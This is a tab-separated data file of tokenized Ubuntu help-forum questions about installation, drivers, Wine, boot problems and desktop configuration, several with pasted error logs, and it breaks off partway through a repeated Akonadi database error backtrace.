25408	how can i burn an iso file to a blank disk ?	i have downloaded the ubuntu 10.10 iso file and am trying to burn it to a blank disc so that i can install it , using ubuntu 8.04 . i have a dual boot system with windows and ubuntu . here 's my experience so far : boot up my current install of hardy heron go to install updates . click on check and informed that 8.10 is available . firstly install any other updates . click on upgrage , get error 'could not find release notes' manually download entire 10.10 image from the internet attempt to burn to disc using brasero . burn fails can no longer mount any discs restart can no longer mount any blank discs , but can mount audio discs restart , now i can mount blank disks right click on .iso image and choose `` open with cd/dvd creator '' attempt to burn image to disk wait 20 minutes while disc is apparently burning , for some reason when it is finished it is still blank attempt to burn again with brasero , burn completes . asks me to reenter disk for checksum . checksum check freezes after 10 minutes . i attempt to eject disk and it tells me 100 % success . after restarting from newly burned cd it shows me a screen with ubuntu and 5 dots , it stays like that for 10 minutes and then eventually i get an error can not mount disk .
25409	how to emulate winkey+arrow windows 7 's maximise shortcut keys ?	in windows 7 ( not sure about other versions ) you have these shortcuts : winkey+up maximize current window winkey+down unmaximize winkey+right maximize height , set width as half of the screen and stick the window on the right winkey+left does the same on the left i 'm particularly interested in the last two shortcuts .
25414	how can i take a screenshot of a whole web page ?	i have been testing various firefox extension for screenshot grabbing , but none of them suited my needs . then i have found shutter ( 0.86.3 ) , and it is really nice . i use exporting to imageshack and ftp a lot . the only thing i miss is grabbing the whole web page area ( not just the part currently visible on the screen ) . is there any shutter extension for this or similar app with such a feature ?
25425	manually install grub	i have the latest puppy linux ( 5.20 , i think ) but it has a problem with grub install at the end of the setup process . how can i install grub ( or grub2 , the easiest one will be great ) manually using my ubuntu 10.04 cd ?
25430	audio not working	anybody could help me in troubleshooting audio problem on ubuntu 9.04 desktop edition ? . for some reason i 've to keep this os not upgraded and i 'm trying to fix the audio problem on this for months . it works well on upgraded version ( 9.10 , 10.04 ) but not on jaunty . aplay -l : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc883 analog [ alc883 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc883 digital [ alc883 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsmod | grep snd : snd_hda_intel 436148 7 snd_pcm_oss 46336 0 snd_mixer_oss 22656 1 snd_pcm_oss snd_pcm 83076 4 snd_hda_intel , snd_pcm_oss snd_seq_dummy 10756 0 snd_seq_oss 37760 0 snd_seq_midi 14336 0 snd_rawmidi 29696 1 snd_seq_midi snd_seq_midi_event 15104 2 snd_seq_oss , snd_seq_midi snd_seq 56880 6 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_seq_midi_event snd_timer 29704 2 snd_pcm , snd_seq snd_seq_device 14988 5 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_rawmidi , snd_seq snd 62756 21 snd_hda_intel , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15200 1 snd snd_page_alloc 16904 2 snd_hda_intel , snd_pcm cat /proc/asound/cards : 0 [ intel ] : hda-intel - hda intel hda intel at 0xe1280000 irq 16 cat /proc/asound/version : advanced linux sound architecture driver version 1.0.18rc3 . vim /etc/modules : # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp audio settings :
25434	which virtualization software supports 3d acceleration ?	i want to run a virtualisation server on my notebook . when ever i log onto my notebook i want to be able to initialise a virtual machine and work with it . the virtual machine could be located off of the notebook on a removable hard disk drive or web ftp etc . i would like 3d support on my virtual instances as i still want to be able to play starcraft 2 on a windows 7 virtual machine . is there software out there that allows for all of this ? i know of software which supports 3d and i know of virtualisation server software but i want both in one . does it exist or is it possible to do so but maybe not as elegantly as i have described ? thanks !
25436	have i lost my entire windows drive and all the files ?	i previously had heron 8.04 installed . today i decided to upgrade . during the partition phase of the install of 10.10 it asked me what portion of the drive i should use . there were a few options : drag the partition size to indicate what i wanted to use a button that said use entire partition a button that said use entire drive i selected use entire partition as the windows partition did not appear on the screen i assumed this was just displaying the existing ubuntu partition . after install i think i have wiped my entire windows partition , i ca n't see it anywhere . i would appreciate some advice as to find if it really is gone forever ( my stupidity i did n't back up my windows partition which includes 3 years of baby photos ) . update : thanks all for your great answers . i read on a forum last night about active partition recovery . i did n't realise it was a commercial product , so the demo does n't let you recover , but it did allow me to see that the whole partition still exists somewhere on the drive . it even let me see the individual files . as suggested i have stopped doing anything with the drive until i can give testdisk a try . if this works i will confirm it in a separate answer for future reference .
25441	futon for ubuntu one	is futon on the ubuntu one server availible ? is it possible to see/modify the couchdb databases on the ubuntu one server ?
25442	find which files are read or written to	i want to see which files are read or written to . is there any program or a command for that ? i can remember i used this method to hunt down viruses and malware hiding locations when i used windows a few years back .
25446	how to install codeigniter ?	please give me a step by step process on how to install codeigniter on ubuntu . i 'm still a newbie . thank you !
25462	broadcom wireless card only works when the power is plugged in	i 've a dell , with a broadcom bcm4312 802.11b/g wireless card . it works well when the laptop is plugged to the power suply , but when it 's with battery it does n't work well . do you know why is this ?
25463	desktopcouch does not sync	i have here two computers , both installed with ubuntu 10.10 . the laptop uses the netbook edition . both are connected , file sync and tomboy notes are working . my desktop syncs databases with ubuntu one , my laptop does not . if i delete for example the contacts database on my desktop , the database is back a view seconds later . if i delete the same database on my laptop , nothing happens . ( i 'm using futon ) if i kill beam , delete the config and try to restart with the dbus-send i got an error error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . how can i fix that ?
25466	how do i access my windows partition using the command line ?	i had a problem with my ubuntu install , and i need to uninstall it . however , i have one folder on there with an important assignment in it that i 'd like to keep still . i can still get into ubuntu with the command line , and it was installed beside windows so i had access to my windows partition as well . my question is - is it possible to access the windows partition using the command line ?
25468	reinstall software after installation of newer version ubuntu	if i plan to install a newer version ubuntu , how shall i know what software that were installed on my previous ubuntu , if i want to reinstall them ? is there a convenient way to install all previous softwares ? how can i keep the settings and configurations for the software ? will it be possible for the newer version ubuntu , the software installed for the older one can not be found for the newer one ? will there be other considerations regarding installation of previous software ? thanks and regards !
25470	what does `` pts/ '' in the output of w mean ?	when i run w - to see who is logged on and what they are doing , i see this : user tty from login @ idle jcpu pcpu what user tty7 :0 08:14 10:32m 44:10 0.50s gnome-session user pts/0 :0.0 09:15 9:30m 0.24s 0.24s /bin/bash user pts/1 :0.0 14:14 4:32m 0.20s 0.20s bash user pts/5 :0.0 18:27 9:24 0.28s 0.28s bash user pts/7 :0.0 18:35 9:57 0.40s 0.40s bash user pts/8 :0.0 18:37 0.00s 0.22s 0.00s w what are the pts/ ?
25473	could n't make angry birds to work on wine	i could run notepad++ easily but i fail to run the angry bird exe . whenever i open the exe , i see one of my screen flickrs a bit ( as lines and not the whole screen ) and nothing happens . any ideas ? edit : output of wine angrybirds.exe fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.vc80.crt '' ( 8.0.50727.4053 ) fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.vc90.crt '' ( 9.0.21022.8 ) err : module : import_dll library msvcp90.dll ( which is needed by l '' c : \\windows\\system32\\appupwrapper.dll '' ) not found err : module : import_dll library appupwrapper.dll ( which is needed by l '' c : \\windows\\system32\\angrybirds.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\windows\\system32\\angrybirds.exe '' failed , status c0000135 i think it did n't even install . i manually dropped those files in the folder but still no gain . edit : progress i dropped the file msvcp90.dll manually and now this is what i get in the output fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.vc80.crt '' ( 8.0.50727.4053 ) fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.vc90.crt '' ( 9.0.21022.8 ) fixme : heap : heapsetinformation 0x541000 0 0x32fd48 4 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 exception : failed to open data/scripts/starlimits.lua wine : unhandled exception 0x40000015 at address 0x7b880023:0x78b271d0 ( thread 0009 ) , starting debugger ... fixme : msvcr90 : __clean_type_info_names_internal ( 0x10267694 ) stub fixme : msvcr90 : __clean_type_info_names_internal ( 0x78506644 ) stub ashfame @ ashfame-desktop : ~ $ process of pid=0008 has terminated no process loaded , can not execute 'echo modules : ' can not get info on module while no process is loaded no process loaded , can not execute 'echo threads : ' process tid prio ( all id : s are in hex ) 0000000e services.exe 00000014 0 00000010 0 0000000f 0 00000011 winedevice.exe 00000018 0 00000016 0 00000013 0 00000012 0 00000019 explorer.exe 0000001a 0 you must be attached to a process to run this command . no process loaded , can not execute 'detach' and there the terminal hangs ( i mean i would have to ctrl + c to get out ) . it shows up the famous message , that it needs to close down . edit : just to let you know that i am still stuck at it . i do n't use wine for anything else , so i am ready to do a clean install of wine and everything if anyone is willing to provide me instructions . resolved as per the marked correct answer by @ dor , i did a mv ~/.wine ~/wine.bak and then re-ran the game and it worked . so basically it was something wrong in the wine install . : )
25476	how to make a usb drive bootable after live image is copied into it using `dd` command ?	i was unable to create live usb drive using dd command while unetbootin works . the former method used to work fine on the particular usb drive . is the usb drive filesystem corrupted ? if yes , how do i fix it ? filesystem : fat 32
25478	how can i autoclean my gnome main menu ?	i like to experiment with lots of different software in my ubuntu install . then , every time ubuntu reaches a new release cycle , i simply do a clean install ( instead of upgrading ) to get rid of all the extra software ( and their respective config files/folders ) . the only thing i always backup and carry to the next install ( besides personal files ) are the config files for gnome , so my desktop is always the way i like it . = ) the problem with that , is that the different packages i test out never get properly uninstalled , so my gnome main menu is full of broken links referring to software i had in previous installations ( which got carried over because i kept the gnome config files ) . is there any automated way to go through my gnome main menu and remove any broken links ? i know how to manually edit the menu , and i could go through it myself , but i 'm looking for some script or package that will clean for me so i would n't have to do it manually every release cycle .
25480	grub-pc installing error	trying to fix my apt-get upgrade , it always stopped at setting up grub-pc ... i read somewhere that i should purge remove my grub2 and then reinstall it . i did that and after lots of paying around i was able to remove it ( was n't such a smart move ) . now i ca n't get it to install again . i am trying sudo apt-get install grub-pc and it just stops at `` setting up grub-pc.. '' and does nothing and because of this it is n't allowing me to do any kind of upgrade or install.. it asks me to sudo dpkg -- configure -a which again stops at setting up grub-pc i think i need help and real soon . thanks , i really appreciate any inputs here to get my system in place before the next reboot .
25482	app installed in ~/usr launches from terminal but not applications menu ( or why does setting ld_library_path in .profile not work as it should )	i have built and installed an application under a directory of my choosing , let 's say under /home/jim/usr , so files have been put in three-four folders , all under this $ home/usr folder ( e.g. , bin , include , lib , share , etc. ) . i can launch this application from the command line just fine as i added the proper paths to my environement variables path and ld_library_path in ~/.bashrc . i added the same paths to the ~/.profile file , which , if i 'm not mistaken , is supposed to be parsed by ubuntu . does n't work . nothing . where can i go from there ? edit : i logged out/in and restarted my computer . both did n't change a thing . the problem seems to come from the fact that no matter what i do the ld_library_path environment variable is not properly passed to ubuntu . using log files , i found that the application i 'm trying to run in this example does n't find one it 's dependencies located in ~/usr/lib . one solution would be to add the /home/jim/usr/lib folder inside a file located in /etc/ld.so.conf.d/ , but i do n't have admin rights on this machine . making a wrapper script like this one works : # ! /bin/bash export ld_library_path= $ hloc/usr/lib application & > $ home/application_messages.log but that would force me to wrap all my home compiled applications with this script . any ideas ? why does ubuntu/gnome remove the ld_library_path environment variable from my set variables ? is it because trying to do this is bad practice ? update ( and solution ) : as found by christopher , there is a bug report about this on launchpad . ld_library_path is unset after parsing of the ~/.profile file . see the bug report . seems the only solution for now is to make a wrapper script .
25483	how do i get back the default ubuntu fonts after installing wine ?	i installed wine and now i notice a different font on facebook and a couple of other sites i use a lot . so , how do i get back the default ubuntu fonts ?
25484	uvc certified : facevsion’s touchcam n1	does anyone know if facevsion’s touchcam n1 is uvc certified , or if it works with ubuntu 10.10 ? if so does it work with cheese , and or skype ? thanks !
25485	how can i place gedit 's tab close buttons on the left ?	i would like to make gedit fit more to the ubuntu default themes ambiance and radiance . therefore i would like to place the tab close buttons on the left instead of the right of each tab . i asked a similar question about firefox , but the best answer was adding an extension . so what can i do for gedit ? besides , i bet i will shortly ask equivalent questions for nautilus , etc .
25488	what is the difference between `` source '' and `` . '' in bash ?	as the question says , what is the difference between executing a script with source command and with . , i.e . : source /some/script and . /some/script
25489	wallpaper change crontab jobs not working after upgrade from 8.04 to 10.04	i have a crontab job set . it is a script to change the desktop background wallpaper every 3 minutes . it was perfectly working before upgrading from hardy to lucid . when upgraded to lucid , the wallpaper changes only when i login . it shows new wallpaper everytime i logout and login again or after restarting . it shows the same wallpapers which were set as the cron job script path . is crontab feature changed in lucid ? what is happening ? please help .
25492	how can i install ubuntu 10.10 from hdd/ cd while running ubuntu 9.10 ?	i am running ubuntu 9.10 and have downloaded the iso for ubuntu 10.10 . i wish to install ubuntu 10.10 my question : 1 . can i install ubuntu 10.10 as an upgrade over 9.10 , so as not to worry about installing drivers and existing apps . 2 . can i install from cd burnt from the 10.10 iso while running ubuntu 9.10 3 . can i install ubuntu 10.10 to a different partition , do i get the option to create a partition during setup ? 4 . can i install ubuntu 10.10 from the iso while running 9.10 , without having to burn to a dvd or a usb if yes , how ? i am asking these questions because , i tried the upgrade option in 9.10 and it gave me the 10.04 upgrade option , which warned me that bluetooth and a whole bunch of apps wo n't work with 10.04 .
25493	is the latest stable release or the latest lts release more suitable for a development machine ?	i was wondering which version of ubuntu is better for my laptop , the current lts release or the latest stable ( but not lts ) release . is it always recommended to go for the latest version for personal laptop ? is it advised to wait for several months after the version was released before installing it , so that the version can be more stable ? if yes , does the cd got right after the release become less useful ? i plan 50 gb for ubuntu partitions , 20 gb for root and 26 gb for home and 4 gb for swap . my main use is programming with several popular programming languages and database and typesetting and browsing internet , seldom gaming , and therefore i will install related applications and compile some libraries for use in programming .
25498	how to append multiple lines of text to a file ?	i want to append this text : < directory `` /var/www/* '' > order allow , deny allow from all allowoverride all < /directory > to the file /etc/apache2/apache2.conf i have access via ssh but i do n't know how to use vim . i would like to do this via a command .
25510	are ubuntuone services coming to kubuntu/kde ?	are ubuntuone services coming to kubuntu/kde desktop in 11.04 ?
25514	how can i maximum compress video files ?	i received 4 .mov files from a client that they want on their mobile website via slideshowpro . each original file was between 200 and 400 mb . i 've gotten each one down to about 30 mb using transmageddon as described here , but that 's still really big for a mobile connection . is there any way to shrink them even further ? maybe it 's the settings ; i used output format = mpeg4 , audio = aac , video = h264 ( which is what is suggested by slideshowpro . )
25516	can not boot from liveusb : âaufs mount failedâ	i used universal usb installer to install an ubuntu 10.04 netbook livecd image on an sd card . during this installation , i indicated that i wanted a persistent liveusb with 4gb dedicated to customization/settings . the installation seems to finish without incident . however , when i try to boot from the sd card using my eeepc 901 , ubuntu fails to start i get the following message : ( initramfs ) mount : mounting aufs on /root failed : no such device . aufs mount failed what can i do to make my installation successfully boot ?
25519	how-to remove `` amd unsupported hardware '' without reinstalling the driver ?	i installed driver from additional drivers ... . amd radeon hd 6450 my resolution is at maximum and catalist control center is working but i have amd unsupported hardware image on the right bottom of my screen . how can i remove it without reinstalling driver ? because the drivers from official amd site does not work .
25521	software center stopped working after i uninstalled kpackagekit	i uninstalled kpackagekit using ubuntu software center . when it uninstalled , it also uninstalled some dependencies . i was not aware it would do that . now , if i try to install any software using ubuntu software center , i get the error '' this error could be caused by required additional software packages which are missing or not installable . futhermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' how can i resolve this ? for example , when i try to install shutter , i get the error '' some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : shutter : depends : libxml-simple-perl but it is not installable depends : libgoo-canvas-perl but it is not going to be installed ''
25523	where can i find a list of compatible audio cards ?	i have a creative sb x-fi xtreme audio , and i faced so many problems with this card regarding compatibility with linux . now i am looking for a new audio card and want to make sure that this time it will be compatible with linux . if you do n't know a websites that has a list of supported linux audio cards just tell me what audio card you are using on linux . thanks for help !
25528	uninstalling ati 's drivers and installing nvidia 's ?	i replaced my graphics card but i 'm not sure how to set things up on ubuntu . when the computer boots , it does n't start gdm ( i think that 's what it 's called ) . instead , it asks me to log in the command line . if i try to do a startx , it tells me there is no amd device connected or something to that extent . i originally installed the ati drivers using the gui . it said that i was using the limited drivers or something to that extent with a popup on the right of one of the taskbars , so i clicked there and updated it . i think it could also be reached by going to system > administration > restricted drivers or something close to that . i tried installing the nivida drivers by doing a sudo apt-get install nvidia-glx-185 and then doing sudo modprobe nvidia and sudo nvidia-xconfig as this guy says but that did n't work . modprobe could n't find anything related to nvidia and nvidia-xconfig was n't an available command for me . since i was n't sure how to remove the ati drivers i did that without messing with them . not sure if that was a good idea .
25531	how to disable alert volume from the command line ?	there is an option in the sound preferences dialog , sound effects tab , to toggle alert volume 'mute ' . it works and suffices for my needs to disable the irritating system beep/bell . however , i reinstall systems a lot for testing purposes and would like to set this setting in a shell script so it 's off without having to fiddle with a gui . but for the life of me i ca n't seem to find where this can be toggled via a command line tool . i 've scanned through gconf-editor , pulseaudio 's pacmd , grepped through /etc , even dug through the gnome-volume-control source code , but i am not seeing how this can be set . i gather that gnome-volume-control has changed since a few releases ago . ideas ?
25536	is there another way for me to backup /home/user other than creating a subvolume ?	i think i 'm having difficulty fully understanding subvolumes and snapshots . the /home partition is btrfs . i want to create a `` backup '' snapshot of /home/user ( for example ) but user has existed for years ( previously ext4 > btrfs-convert ) . i believe you can only make a snapshot of a subvolume . i checked and there are no `` default '' subvolumes already present . 1 ) is there another way for me to backup /home/user other than creating a subvolume /home/user2 and copying everything from user to user2 in order to snapshot it ?
25538	how to troubleshoot a wireless networking regression ?	i 've been experiencing this perhaps slightly odd bug . it works flawlessly in lucid , but not in maverick and natty . i find it seems to work when i 'm booting a partition everyday ( as i do for my main 10.10 partition ) but for my 11.04 testing partition it 's a real pain - usually refusing to connect . i think the problem might be due to the psk authentication/encryption my router is using , but i do n't really know anything about this . so given that i have both a working ( 10.04 ) and not-working ( 10.10 and 11.04 ) installs , how can i troubleshoot my problem ?
25540	suspend fails and i know the module causing it . what can i do ?	my suspend did not correctly since i installed a usb 3 extension card in my pc . instead of going to s3 , the computer just woke up instantly . dmesg gave the hint `` usb_dev_suspend+0x0/0x20 returns -2 '' so i rmmod'ed the `` xhci_hcd '' module which did the trick . is there a good way for me to work around this ? the builds from the kernel mainline ppa did not help , unfortunately , and blacklisting the module is not my favorite option . where is the best place for me to report this issue ?
25543	unmounted disk still spins up regularly	i just added a disk , with partitions but none of them are mounted . the disk will still spin up every now and then . it goes like this : # # # disk spins up hdparm -y /dev/sdb ; date /dev/sdb : issuing sleep command 9 feb 2011 23.37.08 cet # # # disk spins up hdparm -y /dev/sdb ; date /dev/sdb : issuing sleep command 9 feb 2011 23.46.12 cet also it always spins up when i shut down the computer . any tips are welcome , e.g . how can i figure out which process is accessing the disk , are there any daemons doing this ? i know it is n't a cron job .
25545	how to get smooth scrolling in nautilus ?	i am just wondering , how do i get smooth scrolling in nautilus ?
25546	must my laptop connect to internet during installation ?	i am only able to use wireless network while installing ubuntu right now . the installer says for best results , ensure the computer is connected to the internet . i was wondering if not connected to internet , will there be a problem ? is there some remedy after installation without connection to internet ? thanks !
25549	order of partitions for root , home and swap with respect to windows partitions	i am installing ubuntu on the same hard drive as windows 7 . the partitions of windows 7 have already occupied the left part of the hard drive . from left to right , the windows partitions are one partition for windows booting , one for windows os and software installation , and one for data which is planned to mount on ubuntu . i was wondering how to arrange the order of partitions of root , home and swap , i.e . which is on the left just besides one windows partition , which is in the middle and which is on the far right ? is there some consideration regarding about this arrangement ? thanks and regards !
25553	why does akonadi on kde 4.6.0 refuse to start ?	akonadi refuses to start on my fresh installation of kde 4.6.0 from the kubuntu-backports ppa on ubuntu 10.10 maverick meerkat , preventing me from usking kmail . here is the full error output : patches @ pleistocene : ~/.local/share $ akonadictl start starting akonadi server ... done . patches @ pleistocene : ~/.local/share $ connecting to deprecated signal qdbusconnectioninterface : :serviceownerchanged ( qstring , qstring , qstring ) search paths : ( `` /home/patches/bin '' , `` /usr/local/sbin '' , `` /usr/local/bin '' , `` /usr/sbin '' , `` /usr/bin '' , `` /sbin '' , `` /bin '' , `` /usr/games '' , `` /usr/sbin '' , `` /usr/local/sbin '' , `` /usr/local/libexec '' , `` /usr/libexec '' , `` /opt/mysql/libexec '' , `` /opt/local/lib/mysql5/bin '' , `` /opt/mysql/sbin '' ) found mysql_install_db : `` /usr/bin/mysql_install_db '' found mysqlcheck : `` /usr/bin/mysqlcheck '' database process exited unexpectedly during initial connection ! executable : `` /usr/sbin/mysqld-akonadi '' arguments : ( `` -- defaults-file=/home/patches/.local/share/akonadi//mysql.conf '' , `` -- datadir=/home/patches/.local/share/akonadi/db_data/ '' , `` -- socket=/home/patches/.local/share/akonadi/socket-pleistocene/mysql.socket '' ) stdout : `` '' stderr : `` could not open required defaults file : /home/patches/.local/share/akonadi//mysql.conf fatal error in defaults handling . program aborted 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld-akonadi : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 110209 16:41:12 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 110209 16:41:12 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation. '' exit code : 1 process error : `` unknown error '' '' [ 0 : akonadiserver ( _z11akbacktracev+0x35 ) [ 0x8086055 ] 1 : akonadiserver ( ) [ 0x8086516 ] 2 : [ 0xb772e400 ] 3 : [ 0xb772e416 ] 4 : /lib/libc.so.6 ( gsignal+0x51 ) [ 0xb6e9f941 ] 5 : /lib/libc.so.6 ( abort+0x182 ) [ 0xb6ea2e42 ] 6 : /usr/lib/libqtcore.so.4 ( _z17qt_message_output9qtmsgtypepkc+0x8c ) [ 0xb74d62dc ] 7 : akonadiserver ( _zn15filedebugstream9writedataepkcx+0xc4 ) [ 0x8087574 ] 8 : /usr/lib/libqtcore.so.4 ( _zn9qiodevice5writeepkcx+0x8e ) [ 0xb757168e ] 9 : /usr/lib/libqtcore.so.4 ( +0x103425 ) [ 0xb7581425 ] 10 : /usr/lib/libqtcore.so.4 ( _zn11qtextstreamd1ev+0x3d ) [ 0xb758295d ] 11 : akonadiserver ( _zn6qdebugd1ev+0x43 ) [ 0x8081b73 ] 12 : akonadiserver ( _zn13dbconfigmysql19startinternalserverev+0x1c27 ) [ 0x810c177 ] 13 : akonadiserver ( _zn7akonadi13akonadiserver20startdatabaseprocessev+0xe3 ) [ 0x8087a23 ] 14 : akonadiserver ( _zn7akonadi13akonadiserverc1ep7qobject+0xca ) [ 0x8088b6a ] 15 : akonadiserver ( _zn7akonadi13akonadiserver8instanceev+0x48 ) [ 0x808a1d8 ] 16 : akonadiserver ( main+0x364 ) [ 0x8080fb4 ] 17 : /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb6e8bce7 ] 18 : akonadiserver ( ) [ 0x8080b81 ] ] '' processcontrol : application 'akonadiserver ' returned with exit code 255 ( unknown error ) search paths : ( `` /home/patches/bin '' , `` /usr/local/sbin '' , `` /usr/local/bin '' , `` /usr/sbin '' , `` /usr/bin '' , `` /sbin '' , `` /bin '' , `` /usr/games '' , `` /usr/sbin '' , `` /usr/local/sbin '' , `` /usr/local/libexec '' , `` /usr/libexec '' , `` /opt/mysql/libexec '' , `` /opt/local/lib/mysql5/bin '' , `` /opt/mysql/sbin '' ) found mysql_install_db : `` /usr/bin/mysql_install_db '' found mysqlcheck : `` /usr/bin/mysqlcheck '' database process exited unexpectedly during initial connection ! executable : `` /usr/sbin/mysqld-akonadi '' arguments : ( `` -- defaults-file=/home/patches/.local/share/akonadi//mysql.conf '' , `` -- datadir=/home/patches/.local/share/akonadi/db_data/ '' , `` -- socket=/home/patches/.local/share/akonadi/socket-pleistocene/mysql.socket '' ) stdout : `` '' stderr : `` could not open required defaults file : /home/patches/.local/share/akonadi//mysql.conf fatal error in defaults handling . program aborted 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld-akonadi : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 110209 16:41:12 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 110209 16:41:12 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation. '' exit code : 1 process error : `` unknown error '' '' [ 0 : akonadiserver ( _z11akbacktracev+0x35 ) [ 0x8086055 ] 1 : akonadiserver ( ) [ 0x8086516 ] 2 : [ 0xb77ae400 ] 3 : [ 0xb77ae416 ] 4 : /lib/libc.so.6 ( gsignal+0x51 ) [ 0xb6f1f941 ] 5 : /lib/libc.so.6 ( abort+0x182 ) [ 0xb6f22e42 ] 6 : /usr/lib/libqtcore.so.4 ( _z17qt_message_output9qtmsgtypepkc+0x8c ) [ 0xb75562dc ] 7 : akonadiserver ( _zn15filedebugstream9writedataepkcx+0xc4 ) [ 0x8087574 ] 8 : /usr/lib/libqtcore.so.4 ( _zn9qiodevice5writeepkcx+0x8e ) [ 0xb75f168e ] 9 : /usr/lib/libqtcore.so.4 ( +0x103425 ) [ 0xb7601425 ] 10 : /usr/lib/libqtcore.so.4 ( _zn11qtextstreamd1ev+0x3d ) [ 0xb760295d ] 11 : akonadiserver ( _zn6qdebugd1ev+0x43 ) [ 0x8081b73 ] 12 : akonadiserver ( _zn13dbconfigmysql19startinternalserverev+0x1c27 ) [ 0x810c177 ] 13 : akonadiserver ( _zn7akonadi13akonadiserver20startdatabaseprocessev+0xe3 ) [ 0x8087a23 ] 14 : akonadiserver ( _zn7akonadi13akonadiserverc1ep7qobject+0xca ) [ 0x8088b6a ] 15 : akonadiserver ( _zn7akonadi13akonadiserver8instanceev+0x48 ) [ 0x808a1d8 ] 16 : akonadiserver ( main+0x364 ) [ 0x8080fb4 ] 17 : /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb6f0bce7 ] 18 : akonadiserver ( ) [ 0x8080b81 ] ] '' processcontrol : application 'akonadiserver ' returned with exit code 255 ( unknown error ) search paths : ( `` /home/patches/bin '' , `` /usr/local/sbin '' , `` /usr/local/bin '' , `` /usr/sbin '' , `` /usr/bin '' , `` /sbin '' , `` /bin '' , `` /usr/games '' , `` /usr/sbin '' , `` /usr/local/sbin '' , `` /usr/local/libexec '' , `` /usr/libexec '' , `` /opt/mysql/libexec '' , `` /opt/local/lib/mysql5/bin '' , `` /opt/mysql/sbin '' ) found mysql_install_db : `` /usr/bin/mysql_install_db '' found mysqlcheck : `` /usr/bin/mysqlcheck '' database process exited unexpectedly during initial connection ! executable : `` /usr/sbin/mysqld-akonadi '' arguments : ( `` -- defaults-file=/home/patches/.local/share/akonadi//mysql.conf '' , `` -- datadir=/home/patches/.local/share/akonadi/db_data/ '' , `` -- socket=/home/patches/.local/share/akonadi/socket-pleistocene/mysql.socket '' ) stdout : `` '' stderr : `` could not open required defaults file : /home/patches/.local/share/akonadi//mysql.conf fatal error in defaults handling . program aborted 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ warning ] ca n't create test file /home/patches/.local/share/akonadi/db_data/pleistocene.lower-test 110209 16:41:12 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld-akonadi : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 110209 16:41:12 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 110209 16:41:12 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation. '' exit code : 1 process error : `` unknown error '' '' [ 0 : akonadiserver ( _z11akbacktracev+0x35 ) [ 0x8086055 ] 1 : akonadiserver ( ) [ 0x8086516 ] 2 : [ 0xb778b400 ] 3 : [ 0xb778b416 ] 4 : /lib/libc.so.6 ( gsignal+0x51 ) [ 0xb6efc941 ] 5 : /lib/libc.so.6 ( abort+0x182 ) [ 0xb6effe42 ] 6 : /usr/lib/libqtcore.so.4 ( _z17qt_message_output9qtmsgtypepkc+0x8c ) [ 0xb75332dc ] 7 : akonadiserver ( _zn15filedebugstream9writedataepkcx+0xc4 ) [ 0x8087574 ] 8 : /usr/lib/libqtcore.so.4 ( _zn9qiodevice5writeepkcx+0x8e ) [ 0xb75ce68e ] 9 : /usr/lib/libqtcore.so.4 ( +0x103425 ) [ 0xb75de425 ] 10 : /usr/lib/libqtcore.so.4 ( _zn11qtextstreamd1ev+0x3d ) [ 0xb75df95d ] 11 : akonadiserver ( _zn6qdebugd1ev+0x43 ) [ 0x8081b73 ] 12 : akonadiserver ( _zn13dbconfigmysql19startinternalserverev+0x1c27 ) [ 0x810c177 ] 13 : akonadiserver ( _zn7akonadi13akonadiserver20startdatabaseprocessev+0xe3 ) [ 0x8087a23 ] 14 : akonadiserver ( _zn7akonadi13akonadiserverc1ep7qobject+0xca ) [ 0x8088b6a ] 15 : akonadiserver ( _zn7akonadi13akonadiserver8instanceev+0x48 ) [ 0x808a1d8 ] 16 : akonadiserver ( main+0x364 ) [ 0x8080fb4 ] 17 : /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb6ee8ce7 ] 